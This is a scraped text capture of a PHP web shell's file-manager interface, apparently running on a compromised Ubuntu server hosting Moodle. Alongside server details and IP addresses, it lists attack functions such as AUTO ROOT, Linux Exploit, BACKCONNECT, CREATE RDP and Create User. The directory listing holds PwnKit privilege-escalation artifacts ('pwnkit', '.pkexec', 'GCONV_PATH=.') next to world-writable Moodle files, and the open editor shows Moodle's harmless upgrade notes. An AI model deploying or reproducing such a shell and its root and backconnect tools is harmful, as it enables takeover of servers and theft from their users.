Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
repository /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
alfresco
[ DIR ]
drwxrwxrwx
boxnet
[ DIR ]
drwxrwxrwx
coursefiles
[ DIR ]
drwxrwxrwx
dropbox
[ DIR ]
drwxrwxrwx
equella
[ DIR ]
drwxrwxrwx
filesystem
[ DIR ]
drwxrwxrwx
flickr
[ DIR ]
drwxrwxrwx
flickr_public
[ DIR ]
drwxrwxrwx
googledocs
[ DIR ]
drwxrwxrwx
local
[ DIR ]
drwxrwxrwx
merlot
[ DIR ]
drwxrwxrwx
picasa
[ DIR ]
drwxrwxrwx
recent
[ DIR ]
drwxrwxrwx
s3
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwxrwx
url
[ DIR ]
drwxrwxrwx
user
[ DIR ]
drwxrwxrwx
webdav
[ DIR ]
drwxrwxrwx
wikimedia
[ DIR ]
drwxrwxrwx
youtube
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README.txt
224
B
-rwxrwxrwx
draftfiles_ajax.php
12.65
KB
-rwxrwxrwx
draftfiles_manager.php
14.49
KB
-rwxrwxrwx
filepicker.js
90.6
KB
-rwxrwxrwx
filepicker.php
17.32
KB
-rwxrwxrwx
lib.php
121.32
KB
-rwxrwxrwx
manage_instances.php
8.14
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
repository_ajax.php
14.64
KB
-rwxrwxrwx
repository_callback.php
2.86
KB
-rwxrwxrwx
upgrade.txt
2.43
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upgrade.txt
This files describes API changes in /repository/ repository system, information provided here is intended especially for developers. Full details of the repository API are available on Moodle docs: http://docs.moodle.org/dev/Repository_API === 2.5 === * repository::append_suffix() has been deprecated, use repository::get_unused_filename() if you need to get a file name which has not yet been used in the draft area. * contains_private_data() is a new method to determine if a user 'logged in as' another user can access the content of the repository. The default is to return True (no access). * get_typename() returns the type of repository: dropbox, googledocs, etc... * can_be_edited_by_user() encapsulates all the tests to make sure that the current user has the rights to edit the instance of this repository. * repository::get_instances() (used by filepicker and texteditor to populate the list of available repositories) now calls repository constructor specifying the context where repository will be used. When checking permissions inside repository class use: $this->instance->contextid - to find the context where repository was created; $this->context - to find the current context where repository is used. This also means that the same repository instance may now have different names when called from different contexts. Avoid calling repository::get_instance(), use repository::get_repository_by_id() instead. === 2.4 === * copy_to_area() can receive a new parameter called $areamaxbytes which controls the maximum size of the area the files will be stored in. * the repositories using the upload() method should implement a check for $areamaxbytes, see repository/upload/lib.php upload() and process_upload() for an example on how handling it. === 2.3 === * instance_config_form() must now be declared static for php5.4 compatibility. * get_listing() and search() file metadata details are now now more prominently displayed in the interface. Dates and timestamos are now able to be sorted on in the filepicker interface so plugin authors are asked to ensure: - Dates are defined as UNIX timestamps - Filesize is an integer in bytes * It is recomended to define function get_file_source_info() to provide more rich infromation about the source of a file. * The API was extended to allow repositories can now support external references, please see http://docs.moodle.org/dev/Repository_API for further details.
Close